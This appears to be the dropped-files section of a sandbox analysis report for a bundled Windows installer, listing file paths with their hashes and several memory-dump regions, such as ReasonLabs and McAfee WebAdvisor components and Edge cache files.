C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\modern-wizard.bmp

MD5 cbe40fd2b1ec96daedc65da172d90022
SHA1 366c216220aa4329dff6c485fd0e9b0f4f0a7944
SHA256 3ad2dc318056d0a2024af1804ea741146cfc18cc404649a44610cbf8b2056cf2
SHA512 62990cb16e37b6b4eff6ab03571c3a82dcaa21a1d393c3cb01d81f62287777fb0b4b27f8852b5fa71bc975feab5baa486d33f2c58660210e115de7e2bd34ea63

C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\System.dll

MD5 4add245d4ba34b04f213409bfe504c07
SHA1 ef756d6581d70e87d58cc4982e3f4d18e0ea5b09
SHA256 9111099efe9d5c9b391dc132b2faf0a3851a760d4106d5368e30ac744eb42706
SHA512 1bd260cabe5ea3cefbbc675162f30092ab157893510f45a1b571489e03ebb2903c55f64f89812754d3fe03c8f10012b8078d1261a7e73ac1f87c82f714bce03d

C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\nsDialogs.dll

MD5 1d8f01a83ddd259bc339902c1d33c8f1
SHA1 9f7806af462c94c39e2ec6cc9c7ad05c44eba04e
SHA256 4b7d17da290f41ebe244827cc295ce7e580da2f7e9f7cc3efc1abc6898e3c9ed
SHA512 28bf647374b4b500a0f3dbced70c2b256f93940e2b39160512e6e486ac31d1d90945acecef578f61b0a501f27c7106b6ffc3deab2ec3bfb3d9af24c9449a1567

C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\NpcapPage.ini

MD5 a9fc79cc765ac0933fcf8d3d983c6cd7
SHA1 ac43e6ee6ec12de89cba4795f540c964d44e7a90
SHA256 e7c6838d5677f428df10c103efcd7b64cae68505045298fe98d84b18cd21b22a
SHA512 aaccc6e7b804f8229e64aa0dbd5362bdf3e7cf6560c6fcc018564826a2cc835d8cecf086d5c3a401a1373dbefcb520068e1402367381827ad65b8be8f413fa5e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fbbc3b076556d40d_0

MD5 39e4f2100b891eb46f25ab9974294bdc
SHA1 109c9e6b381410b3906c2c99d579d63928244356
SHA256 002827c7db2af306bb9d538c4de5c2d961f00e3dffd9335ca617af051523bcb5
SHA512 2c3082c9340469465d42fc8c358dce79d6dbd67ee9fa9439d030ba35b09181e1c0bbf2a77fedf7daea1fa0871d6a700c43cc80308f188f641f914526248b07be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\635e64b37935c888_0

MD5 510a5c6625dce5d259526a9229fe9546
SHA1 7f49ad57cf364b9584eabe90b6eebb38f8ba537f
SHA256 a9436a36c93b5b58144a84d4aee9588a300c8ebfc1b852e8a14b51652eb32da0
SHA512 febdb320991258dd23cd58c88449b4d1e4424dab3c420d2a6cbbcb53c5a7d526a5f778a67b317280092385670f4a32332d19a493c15c718eecf63a7f39021e51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\62f20db8aae8f96d_0

MD5 7cb61e9f0873ad458576cc3304eaa886
SHA1 0abfe4bd5a44122f96cb963968a1851cc0d860cb
SHA256 0f1644e840325b95ecdcd9199144f83bd8e3109cb034777fc633a566c86d2806
SHA512 daaf367deb8768afd8e6422132b64a187eeb57c2c21abd1945f0de10ed22e597068210982b411030415053907473bb92d8b8f5ad9df4383cc00caec7853a7a9a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\87bfea9426cb2ef3_0

MD5 3b4c98b44ec1848d81834b61945bc501
SHA1 08484a173d87defa74937f085717e0c97a949c87
SHA256 8aa2dad7f175b534436086374dd33da3eabbe26b29365d9e95f7438b1ed54436
SHA512 7d0ffca64c66d7f9a6a7c71c7251d2e0942511403bc32917ae555b0b5d3bc97598fc1f9a344d9a6078e1e03394e834a6e0a986d29733c1997f3cbc083faebefa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5de9f44e801f6134_0

MD5 55b2dcb252cd21e73515f6ef56399f0f
SHA1 05e201041e5641710d315918fc8d71735e473eef
SHA256 fe9ea75f1d8c7def62a5c0f89457543d2df6cfad973d1041486bbeed1d58de80
SHA512 99073c2514fe188aeeeb4835f9af554090ce828ec8848301b4bee135b6a3007dfed8889d0e2f09effd98420493062f761cc037cd9d1f9c80755f0352f60cd2fe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a6537dab24e365f9_0

MD5 67a590f96f2c5d36736ad973c768489e
SHA1 a78f018f73596371854729a73448e4aec66d75d3
SHA256 e92824ce35e2e0992c46ab59a9a552b4e94483db5a05dd3e45b64c1a816df24e
SHA512 c54617da41933092694046ef772f9bc8eda69c9ce748714b07b09770b3f9135b6c4a7a7ffddc086d7095567cb2c9f037177980905805651497e1c91d88c42fa6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1f50cb46f9f38530f429ac69b0c9cafb
SHA1 118d0aed577f5502d1098e46f2335bcbe1b24dad
SHA256 c3cf4e51f90d3dc5551cc99a6a1abfcca1305b69b1c312fed2f1129456e4a388
SHA512 6f6efeeba8fc5d20a22d47365772606a7c0ca6ef9aac74d195771426ed1e3aae866b556db3e003389bbb2ff18cdda4dfa189455a4bb93058f9c0135a3e4e519a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e6be23e72af65979dbfcb8d4163032d1
SHA1 d8262a9c33ea66d8f2d32eb58d5a35f38763b595
SHA256 f86a71eaefcba24789a91a9c589f75f9fd055756f1711e6f22eec171be39c1a2
SHA512 abe4049a853bb085f6dd0abc366d7b33939234755e5dbfbe9976ba42eece7e704704606c3c23fdd70dfdd320e69696f3945e5f1fb0dafeb81087bf859d160de3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 ac472db4682501f31639ee87ec841e7f
SHA1 f3a4a29a90485eb2e1f10e1afc0cfff02f3451b1
SHA256 bf42658a09bb3dccb0c63cc60bf574443890e62538a5412c7184c4a7ee66dc2d
SHA512 a246d6870026084da83bb4705cb911fbb2066ca5769e73e9164f6282886396cf064ca273ba4bb7dc4be1abbffb8923e96c3b01ab503a35ecbe2ed2064018b453

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000175

MD5 c610514e5756020cfb3c727b77b2c83e
SHA1 4083cc96db7af4deac95b32329baa78b7a584f49
SHA256 0148f8f91e2ef35d38ba66c9e01f3deeab27bfedcddc77cd782908c401ac9ca8
SHA512 039625607b59612a9eefa3bd00a07be62cb531aa201d1413da190ecc9ff33e35a8c7a4d095615dc3d08856de1c0ff6c4e080bee8b7ca53174f78d349a2fc6572

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000169

MD5 3a7f125d07b73dcce2e9a03ad88e7348
SHA1 1d10161071cc3140a2f0c4b60b3ff7f140ab9150
SHA256 6aa59e6c42031f079010fb5d840b378e2a6f0013149dde0087aecc885fd9e3b9
SHA512 13b5f99ec212538ca304e80b53ceca89c2f5fbf427d876ab5ea4208306e4d4557bda331fae51dcf7c6f2eb9718061a5afad6e51be6b59cac175a7dd65439737a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00017a

MD5 ddf9e6b63630bc36d67d1253a926ee48
SHA1 63d5e02dbb16b05885c20dee9541bbc6f939eee5
SHA256 228220fb6aa57f32c5901e60f1a2e17ebae1a6d411ac4c33259cfc870070ca61
SHA512 c71a5d5b8c56f7990e70cd0e91f7dab1adf8be7173ff192f566ba5da2cc4bc7e9cf3f5382e9b64dae63b3ec66d2186e17f6ecaeab864152bf33faf9a90578d41

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 7bdda9f81cdc37e122646cb2a47f8cf7
SHA1 8ca706cc20953d540f05822facd4ec1a69e79c44
SHA256 ab521b72ca8a7ca120779fb59fc28c7ac923610ffce7828072f0fbe79ccdd86e
SHA512 164cfa5a20a1efdb974ec6ec2ef829a89ae88863f7a70ad5ddc8d2e3fb706ffffae421661aeb40d42115bd8b5f2249848b27a4078ea40b7a22baf81dfb0224c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00017c

MD5 24b41309788491249456b7adfd7e5c7c
SHA1 ab287e3a01879b7e07f37ce8437872bc3c879097
SHA256 120559635035854c73bc2e58e6d6586a17818a79bf42ad2dff745fa42911e0df
SHA512 e950fb7394e7095675955841e59bb7540c8b2f6142e056c9ae256769a5c8335a8b51ab385208c57ca798eaeaa831f97eb2572aaac456620a4f62822ad7f6839a

C:\Users\Admin\Downloads\Unconfirmed 939052.crdownload

MD5 e5e01f0d3b7781d3bf30a9b93a8272cc
SHA1 01027b81bf4b0587337d89635d500c5ba129d7a4
SHA256 ce144cae653be70d139d2e98feeaa9b1042ca04f313bb4d6ddea7215f8b21f31
SHA512 f31df11e71282926d98f65403eaf29dc7537e23a355bba519a9eda7e315dbc7605c2f2e1f8e28c801034be00f150cb58375e591f4fe422cd8bc9a56a547a7eb2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000180

MD5 1aca735014a6bb648f468ee476680d5b
SHA1 6d28e3ae6e42784769199948211e3aa0806fa62c
SHA256 e563f60814c73c0f4261067bd14c15f2c7f72ed2906670ed4076ebe0d6e9244a
SHA512 808aa9af5a3164f31466af4bac25c8a8c3f19910579cf176033359500c8e26f0a96cdc68ccf8808b65937dc87c121238c1c1b0be296d4306d5d197a1e4c38e86

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e64d342c903c7bc8248a88817f294124
SHA1 9df47502aa56b9998ebc60c9ca588a2aa93d5841
SHA256 b3ad7ec38e9eb5dd7da08749cf31838f7ed230851b280b805b74b667bcec2435
SHA512 d1acc6bd1677b48723e40ebd6f3b444d4d1f35b0f7c86b4d901bf860285a3892b89574ecd1d239e467bfcf9c9bac60770e388bddc6de34951a2bd2223bdcf5a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 299b2de7b2ca97f9495018a2a206824c
SHA1 654397ad33e983e83c115b5e3a842ec353e5f306
SHA256 f6bad2cfc6d118e239cd89f4e34ad858d9efb1ac5d0ec8e3077ad7b9dd398ee0
SHA512 e2b335b1f0d4e07b29bbf7219bd531fa748b9a9fb5bb967f3ae3e688b71887aeafca9a4bb919d6ef59abb3b0070492897e71b2c06373ae8f2acba3fd85f379d8

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\mainlogo.jpg

MD5 b32ab39917345eee4b2d62423d451454
SHA1 8da278769c5bf6b7d612852681070635b0a143f6
SHA256 56501b498e2c103162df7a95099c95bdf2834cc6848b7516dfac048ec3cb7ef3
SHA512 c1987dc6ebce69c23a8ad9b615df9e9786111b876e71dc210e70f6496effcc925881d82ca2b7135d2a380fa27632e9c0d6f55658f479e3e609cf3902f55c32c7

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\RAV_Cross.png

MD5 4167c79312b27c8002cbeea023fe8cb5
SHA1 fda8a34c9eba906993a336d01557801a68ac6681
SHA256 c3bf350627b842bed55e6a72ab53da15719b4f33c267a6a132cb99ff6afe3cd8
SHA512 4815746e5e30cbef626228601f957d993752a3d45130feeda335690b7d21ed3d6d6a6dc0ad68a1d5ba584b05791053a4fc7e9ac7b64abd47feaa8d3b919353bb

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\WebAdvisor.png

MD5 5fd73821f3f097d177009d88dfd33605
SHA1 1bacbbfe59727fa26ffa261fb8002f4b70a7e653
SHA256 a6ecce54116936ca27d4be9797e32bf2f3cfc7e41519a23032992970fbd9d3ba
SHA512 1769a6dfaa30aac5997f8d37f1df3ed4aab5bbee2abbcb30bde4230afed02e1ea9e81720b60f093a4c7fb15e22ee15a3a71ff7b84f052f6759640734af976e02

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4f3f29b9f15385d89a6733830ad24a78
SHA1 cafd234d7ae4843c37bcaa1785d58ec7b4883563
SHA256 cd42e4d1fa3da4073b883022acb086dc58a9b00a2567ef3486fdb2aa0c546a71
SHA512 c435164038bb37db6b1975b712184d98f1d5b3b8b02483b1cefb05700265299c1a3c92730d649e685fec98e79676ceb780af30c962e6eeb8616f8e26d7a51941

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 3e06c76dbc0f8b3b1edf1136c077ddd3
SHA1 64ba16790b243b6314b237e0c90e4581f8134c11
SHA256 5c325f996ddf1ea11773a127db9e6612b4ac425f741c6a186bbcbd53b5a9017f
SHA512 d299d3eeb6112fe5198245d9668cbaf7038898319bccf60d27f320e640ee08196a140f2f8f3c0a5d5fc429e9fd9153442cf5e9ec1e5628e64ce1dcb136313766

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f99d76875039b714_0

MD5 8404f903377d666c9270c4ead185a51d
SHA1 639d799833c928c976accbf3693ceeac6afdc322
SHA256 d9755a1c2cc2c2d73179a46818d117864d77a4dde0175e8d39ad0a63a5f4d490
SHA512 a3fe3466ffdacacea92526f96414f9e4b133fc1c24a8592ba0bf3169459783e395b0c0be98c26305ddb43ef60cd107ea400d88c6ff3b72419b0c7cbcab393941

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000176

MD5 42d9fcc7172456834d9e05605cfb999f
SHA1 d1df0982a953011482b7cc5e97803a5fae290ba7
SHA256 5029f1471e648ecdf5518199b5d7a6fdcf2dab7b9ba8367331b0836de3064575
SHA512 5fc471dfd6cf0516739b40db211b4f1e0d3e27e7b53eb1e0c8d34f7ddf5d09ff520bd4c3b7baca993857fd462f184621391fed363a548bc7b50eee3b7ef6ade8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\566bdb0a97eb51b2_0

MD5 006e65ae79e9814a705dafccdb8e71c3
SHA1 cbb9e27ae2706926526735cbc785223544370c4a
SHA256 88d45f94795d4b12954abbce1e6ea6a4e53c14f6f69504bc380f75d244e52d63
SHA512 f84484ad1d8a9a28ef39315ca6b05f9924579d3530f52ae0e5af21ed6db79580a6dc73ba96850ea0a805dece156eb00c144945ba54b7eb245aec82afa32f6fef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\eb830c0afa637c23_0

MD5 e4329da2ee891284b225750a8e2fd6a8
SHA1 cffc807edf1c802934e2f557a703f16887eb760c
SHA256 ff06222b979a933d8e1e173b3b33cb2d317ee11104865d4a6daf3d045efad1d1
SHA512 8c64c4cffb2530da6fddfd1f6ac35d733b066e6cb96e34883e903e5dba875f58cca2411647dd76bc3fc25a90244fc11d69c21be8da947d70233a59f2e2fc639d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2b8c88f1fb9ba7d8_0

MD5 a7c0959bb442a479ef3a222e6b267d60
SHA1 6cc80ab02750da6c9073b89281e7652d453c27ff
SHA256 cea83b8a2f779462b4465f57c087e664c30bd609c7386db480942777559c132e
SHA512 16c13d0773b141f16068b3179c008bc835cddafcab4d478710805b2c17d45c0c3f1bbf732b160e88721438e69fb79f0b5af823218e8f7dd92136dcc90487c1b5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000177

MD5 60140bc834da90837a9a4d1530484677
SHA1 d99868b0693b332681b4db7927f3f11b3ed37607
SHA256 29c0ba2fb11f5bbedff938e0d0a97da59f725cd153bc0c04f052419e779f134e
SHA512 448ddc49ab5128dfc0dc91ebe388d447e748848cd2f7dc15fe1fd0380a5436cc9872c32606d9d161d3648b20bff5eda0e48e8fb77c9293f3c0924ae89589eb37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3c25548cf18bc38b_0

MD5 a47f2f0ad10c2e9b738cfaeb86286b8d
SHA1 2c9a3f140676ce70539048bc4a0f81c9c48055e3
SHA256 2d72c3682dcc8d04b0eb73a439b75f9bb2d01a8ca30b0f1c91215a194ea6e397
SHA512 6203268ae97bcb1aaf27c4084e4f7283225e6a675ef5050d905024001d4eabc5b278e16c41622760eda0f6ee81f54c2f4402048d60e86232357626f6763f01eb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 ea938eeca49dd300c717076e2ba1c413
SHA1 2a86b868bf18e43a3490ab479c8d0f39662d969e
SHA256 49291a417ce0a1e312b73bfab76ead51fea03b1d9d588502839a42f93c490122
SHA512 7ced8e44b77b1b7ad172baa6118d93ebeb360200f65296b0af29730f8629dd4c033b0221f4a622115d15c035e452aefd9b17f9725464f6ab5111340bf14da8ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 212899703ba207ef4aea23afdf804d84
SHA1 8d1bee9ea4f55d18110a18a0a26793b41839356e
SHA256 417d9c589fc959b36d6b9ae5c921137638982bba20131c9d45bad9299db94b11
SHA512 d940a725c972693d8b001852b272c4af8d1edcd1b604bc842261dce637845bb0145b90cea275a53a9f6cdbd376e39be55a9ca46dda36387d497b7b498870a0fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 dce5ced05e752b1c1a9e4575e26347a7
SHA1 2dcd4763176048149ec93f60027e846740b28f67
SHA256 d9d535ab6c21665ecdd08004a268983ca1864267a606a32e2ac5da800fd8abed
SHA512 e09f95deb0beb59b01f103b55c4768790be208c98a4eae0163209a825f2c99fd4c2467415a9331bc51fc984b3db715ddf3a41fc96d1dcc5771750cfd93f22529

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b80cbf36fef9e7a0_0

MD5 5ceabe24bf1ca2ea2b971e0aa4051de3
SHA1 33c9bbff4b91925ee6fbe474325600e52e1d1daa
SHA256 bfe94766d0707773cc5b081f09a1cec6e35fc260fd2ec0b3b192d4d2a7d8e7bb
SHA512 651946f5e4343ec3268c313d55d246be8ba0472fc84ed17a7c30358214dbae0235abdebaf981145e88d4592cff4fc92d9748d14fa8cad6dffcf6dbb63f4ff996

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 db4daf1b8d6ffdc86b157b7106999c1d
SHA1 57b164be0b52e340e93f3ecff7c8356d7ef1d884
SHA256 83748ae75034c88b7c0fcbb58f9219c1e09a9ca82557a33bd2783d9b3152dd7d
SHA512 c1ac94cc9beb490d2d26e8d81cd6500fd24f82c9d5bda41c343a7c79a082a954f31bce4c0ae5a29effd87c5b35d804efd2575315220d9daaf4bb1b8b4cfd25d9

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component0.exe

MD5 76c869dda0bc5aadf98441a126bc07dd
SHA1 dd74f48eade2b30424e55e46776db68bac208506
SHA256 3b355b2abdf35e53e77282f6aaadc5be5ff6f3f974c0a65871a02c378c24f62a
SHA512 744bfebc3d27ba03c48839a894d3bdc3dab09c3a433081feb2bd5554575a9faf1d0dccf720d81f133fe989aa54ed93ec70eb63c62ae2ca054775d9d97981d2e9

memory/8352-27920-0x000001CF646A0000-0x000001CF646A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1.zip

MD5 f68008b70822bd28c82d13a289deb418
SHA1 06abbe109ba6dfd4153d76cd65bfffae129c41d8
SHA256 cc6f4faf4e8a9f4d2269d1d69a69ea326f789620fb98078cc98597f3cb998589
SHA512 fa482942e32e14011ae3c6762c638ccb0a0e8ec0055d2327c3acc381dddf1400de79e4e9321a39a418800d072e59c36b94b13b7eb62751d3aec990fb38ce9253

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe

MD5 143255618462a577de27286a272584e1
SHA1 efc032a6822bc57bcd0c9662a6a062be45f11acb
SHA256 f5aa950381fbcea7d730aa794974ca9e3310384a95d6cf4d015fbdbd9797b3e4
SHA512 c0a084d5c0b645e6a6479b234fa73c405f56310119dd7c8b061334544c47622fdd5139db9781b339bb3d3e17ac59fddb7d7860834ecfe8aad6d2ae8c869e1cb9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 03a21a472dd13d27a9b4289a3219360e
SHA1 746972c104bde4cc2ca09526d886ed796c13056a
SHA256 6a03d5dbdda93be97f87f1315cbf887bbe84e9dd3c1475082d4e91b54d7330ae
SHA512 65491794139ceb78eb022dd5047d923098680a0993ac80a580e1208f0cb28cc68d0eaac048146fd31e6470826431fcd25224a228c3a3a118ce4e5704c02cf067

C:\Users\Admin\AppData\Local\Temp\yx4yle0s.exe

MD5 d7c21f5dd7f75c0f933a98c44ac6d954
SHA1 e9e43b04099bc25f127172d7d18f55882ea4330d
SHA256 c673c8b5a87634f01d2b0f499338496373cb2acba370667aa42ee365a0c3c03e
SHA512 87d5884a8cfb2dca00d22cf197f65f9bcd09bb12bf5bc7a84d78c56da8d12470364e91e7c7a8ae1d33d7214eb62f1cf3124c9a39402e8d5636fa57429b88a498

memory/3136-28095-0x00000208013A0000-0x00000208014B0000-memory.dmp

memory/3136-28096-0x0000020803080000-0x00000208030C2000-memory.dmp

memory/3136-28097-0x0000020801880000-0x00000208018B0000-memory.dmp

memory/3136-28098-0x0000020803170000-0x00000208031AA000-memory.dmp

memory/3136-28099-0x0000020803120000-0x000002080314A000-memory.dmp

memory/3136-28102-0x000002081C190000-0x000002081C1E8000-memory.dmp

C:\Program Files\ReasonLabs\EPP\Uninstall.exe

MD5 8157d03d4cd74d7df9f49555a04f4272
SHA1 eae3dad1a3794c884fae0d92b101f55393153f4e
SHA256 cdf775b4d83864b071dbcfeed6d5da930a9f065919d195bb801b6ffaf9645b74
SHA512 64a764068810a49a8d3191bc534cd6d7031e636ae306d2204af478b35d102012d8c7e502ed31af88280689012dc8e6afd3f7b2a1fe1e25da6142388713b67fa7

C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe

MD5 cc7167823d2d6d25e121fc437ae6a596
SHA1 559c334cd3986879947653b7b37e139e0c3c6262
SHA256 6138d9ea038014b293dac1c8fde8c0d051c0435c72cd6e7df08b2f095b27d916
SHA512 d4945c528e4687af03b40c27f29b3cbf1a8d1daf0ee7de10cd0cb19288b7bc47fae979e1462b3fa03692bf67da51ab6fa562eb0e30b73e55828f3735bbfffa48

C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\ioSpecial.ini

MD5 29ecd2cdbb52b977b225065f82e6e848
SHA1 a51100ef182e07d1cb46d530d5b920ea3031953e
SHA256 1d72a130b3a13f941a796dcd565ffd73f0c62e6fcc0d08df15ead5439370aa9e
SHA512 6934473caf2c2cc0de86da5a441400848f6810dcede6b29a6001813a60627a913520a081f4d774beb7ba98efe23f2ca6df2030854252a97627a6b728e219d5c1

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\installer.exe

MD5 8d6d7d2b4b15a56c187288485d57f2a3
SHA1 06980d9bb48deb03fcc34734d45a12a7e73a174e
SHA256 eeed21499b9903b7d8d09392db96475c432ada134afc8ac68099bcf4238dae05
SHA512 e6c3a2d2e956ff8cba77b824e1e9daeb25bce8350c85bd26f5184d5ce9d08e0c76bbdb3772e671a87eb50daeaa45966064cce09374bd6b68985bac90dfefd41a

C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

MD5 10c8f70b113fe3c71403c372651c18fd
SHA1 aa0bdadaf0e3c6f4b7b213e6753c773b5aefc991
SHA256 8d5a7cbd136a74b7e73ec627af5a9e4e7cd6ca62682b2e1639fd8d9865108152
SHA512 e9ef78daa3434ab4f87050088714c330d497894fa56fe254e0c6124e8d9e2a6a39bfa79998b2baf69b78cd74160af5788f63d8809a196fc0a05a277a335750f6

C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

MD5 ae4586f0332f1ad1cf66628ef11225c2
SHA1 e717cd1f5859d768ee4aa7d606081d35c6c0585d
SHA256 46502ad5b9928c11d1846e83272b61486f6ca655e0d7c7c342e2249daa45b9a4
SHA512 adf86bd101d93414ed049a941f8ba91c0579cd0be8afc719d731faccefc7468202786dd4263cf6424b3bea8979370243da6c08f07ac12b5d320aece3ef61c256

C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

MD5 becad56e1386d59d190ee6260e19ecb5
SHA1 455dd7dbbf6b4a99891915e2ba25d1a7ee7ac96c
SHA256 99dcff41a047a129ec792dbb6b538cc3724fcbffe7eb1db0316cc948e0142ac6
SHA512 92e1723cde0e3a2957651484bce3a70522d3865416bae99fc962d39dfe71746d92b37c6bdc7a05a613e0e1d70389c89e55308b902b049289ff1b62997fb28f4e

C:\Program Files\McAfee\WebAdvisor\Analytics\dataConfig.cab

MD5 582cb55f1d5488c19de8a02e5c22e1b1
SHA1 107898c4b33c797fbdeaccf0d4c73c18e30fe81a
SHA256 7740054020dd617171342f29863839b1ab9e7666ea5e5467039f30306bd409b1
SHA512 ca3abfb0ba9b34bd006dc9576b1d56294ccf2b3086483277a15e6b96ed7ed206a858acfa618d6188f76214d86b2f2f40b43f2f10b3026dc3e5bcbe223186357c

C:\ProgramData\McAfee\WebAdvisor\UIManager.dll\log_00200057003F001D0006.txt

MD5 6a760dc9aaaf9cf299fd0b38b0878e0f
SHA1 60d0b468e1553f650ac978857bd4987df478d3bf
SHA256 face7674cae55e68a0656b5f4f3c36aed232341d0b10da023c13863b47a4b74d
SHA512 9221acb2a25837bca298246660e806feb0daffbace0b1596467612c8697afbc3c7b9c3c4c898127f7775e2438147f96cbc1f0f21731a24ee0413ed9770b225a4

C:\ProgramData\McAfee\WebAdvisor\WATaskManager.dll\log_00200057003F001D0006.txt

MD5 479f3c62b975fb9a527db6835e436389
SHA1 b0823e0f791811a3a3d8b2130dbed3855f3482de
SHA256 fb2bde66fdf090c656c36a4e3d3c30570614560d17a23a8bdc6bc32b3fda10c4
SHA512 1c43ff24535aa9602401fabe75254d66b18e18e5a8659cc314ae955c8eed1afada05aa2fdc0ace37d133bfbc09c972db486afcd201b6fa6703d6dc67802a98f8

C:\ProgramData\McAfee\WebAdvisor\UIManager.dll\log_00200057003F001D0006.txt

MD5 6d4d365bf2c09377d09e546acf1bdcb2
SHA1 cb271eaf01fd9fa6c68d5d14a75a1f1bac33dbbe
SHA256 a84e001fa1716fbc1164201ab543c998738b7f47095a8bb527deb0a91e95db48
SHA512 497505a0b08211c3b8949c8c927a8869a279419f2653b9076f440b183e1ff97bde3528d2c9fcbaaa84ac9ea2d29e440d8885b0394bd60df406cedc11e9c35082

C:\ProgramData\McAfee\WebAdvisor\UIManager.dll\log_00200057003F001D0006.txt

MD5 2a89ac34343bab194735b8749c69e7c4
SHA1 0119aa83472beb75e18df3b166048b98096fc1e9
SHA256 01652cdde5798bfcb4c16f45477065871b46e89b2a4a22ad982dacf7e8fa9555
SHA512 4b64670d930c9fe95c46394ebf296196277b2dc75429751608a7ebd4d42497c21508708b44375f93563817428f01344b89fde84819b7c374b6d40139c6c24908

C:\Program Files\ReasonLabs\EPP\InstallerLib.dll

MD5 5e2b4c627d4afac7b138fb229f3ba8cf
SHA1 7b8b27bfcbc2603f7e10474d3895e6dc821992c0
SHA256 b3df61de305444755aa5c79b4a88f10d5474980db8da0d674856ba158eb1c3b6
SHA512 325d151197bce5ba7a9ba76cdaaf5f9f5a3fc546542e78dc2b3b35337654a65ee2d19d20112d82b496104f148acb6b25e8c3d27a567b5eb6f0b2aa38aa4093ed

C:\Program Files\ReasonLabs\EPP\mc.dll

MD5 5761d96590d91fa336c068269a7dbd93
SHA1 5a1b0a8b4f255680a7549b2b27c28dd65a5a3e47
SHA256 7dc02294611987dcffef0d1ce99ff316926901fc872099cbea2fb76997e29f65
SHA512 f8f5743547c96aeb579b7786fc9af64102bef3cf46a6df270cccf5d51a48467d9547732ff49f8d5258e7f28a5bf2d234d3344c2862a5a67f5054de81ec6f4ea2

C:\Program Files\ReasonLabs\EPP\rsEngine.Core.dll

MD5 b3b1147d7bcff3698ed64b9ca31dd75d
SHA1 cfcfecdfef6103e606e6559920b0164e6ddec856
SHA256 1f260a7cf65d80332a58a16b713570054e83d2d842b17ca76262dedef69922f8
SHA512 8638c0c96ed95c6ce5b00444b7287b0017b2ad1c1aab874b9caa9210fcaf4f7e7a3aac6b261e6e2686b66bbb02d6a68827541bf7a78a922d057a0c0846884614

C:\Users\Admin\AppData\Local\Temp\7zS0779229A\f2b877fd-56e5-4f8a-b2ee-f68d56f2606c\UnifiedStub-installer.exe\assembly\dl3\6609eea0\47105276_eeb0da01\rsStubLib.dll

MD5 fa4e3d9b299da1abc5f33f1fb00bfa4f
SHA1 9919b46034b9eff849af8b34bc48aa39fb5b6386
SHA256 9631939542e366730a9284a63f1d0d5459c77ec0b3d94de41196f719fc642a96
SHA512 d21cf55d6b537ef9882eacd737e153812c0990e6bdea44f5352dfe0b1320e530f89f150662e88db63bedf7f691a11d89f432a3c32c8a14d1eb5fc99387420680

C:\Program Files\ReasonLabs\EPP\ui\EPP.exe

MD5 09e2401f12f54289c04af17d90f0798f
SHA1 2f95c7a2684338f5fc66b0c20e148b2a9938b154
SHA256 3efd3ea030a60cf4c5e0c6b93fdd24f1743e56cecd3a30329375ff80ef47091d
SHA512 8337b3f7bb29f546eaefe9adb8b7674007176c0f6d429d9b51df7eacf41b09042359d028ded0c934f71ce11e308252b86846027e10e07529327a451cfe7c2206

memory/3136-30433-0x000002081BFC0000-0x000002081C016000-memory.dmp

